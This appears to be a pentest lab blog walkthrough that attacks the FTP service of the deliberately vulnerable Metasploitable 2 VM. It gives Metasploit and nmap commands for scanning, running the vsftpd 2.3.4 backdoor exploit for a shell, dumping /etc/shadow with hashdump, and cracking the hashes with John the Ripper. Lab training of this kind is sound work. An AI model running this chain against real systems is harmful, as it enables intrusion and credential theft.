Metasploitable 2: Port 21
In the previous article Metasploit 2 I — Lab Setup I’ve explained how to install and prepare metasploitable 2 in a virtual environment for the purpose of pentesting.
I’ve ended the article after running a nmap and a metaploit syn scan module:
Port 21 scan
In the picture above we can see a list of open ports. Our job as pentesters is to determine how secure (or not) are the services running in those ports. We’ll start with port 21, ftp default port.
Within the metasploit framework we’ll run a nmap service scan targeting port 21:
> db_nmap -p 21 192.168.231.109 -A -sV -sC
MSF also has an auxiliary module for ftp:
> use auxiliary/scanner/ftp/ftp_version
> run
Remember: the RHOSTS variable was set globally in the previous article.
Lets view the results of our port scan:
We have a FTP Server, specifically vsFTP 2.3.4. running. Lets do a search in exploitDB through searchploit:
$ searchploit vsftp
As we can see, there is a backdoor command execution exploit for our version of vsftp. Lets go back to MSF, search for the exploit, load it, view its information and run it:
> grep vsftp search exploits
> use exploit/unix/ftp/vsftp_234_backdoor
>show info
> run
And now we have a shell in session 2. We can send it to background (^Z), list opened sessions (sessions -l) and interact (sessions 2)
We’ll try to extract users and passwords from the target using the hashdump module. Put the session in the background and select the module:
> use post/linux/gather/hashdump
> show options
> set SESSION 2
> show info
> run
Now use the ‘loot’ command to see the results so far:
> loot
We were able to obtain the passwd, shadow and unshadow files.
Open another terminal to get John the Ripper to crack them open:
$ john .msf4/loot/20190402110303_metasploitable2_192.168.231.109_linux.hashes_935091.txt
To view results use the --show option:
Conclusion
Continuing where we left off in part I, we scanned port 21 and determined that a vulnerable version was running the FTP service. Using MSF we were able to:
- create a remote session,
- get the /etc/passwd and /etc/shadow files
- obtain access credentials using John the Ripper
We’ll keep probing Metasploitable 2 in the next articles.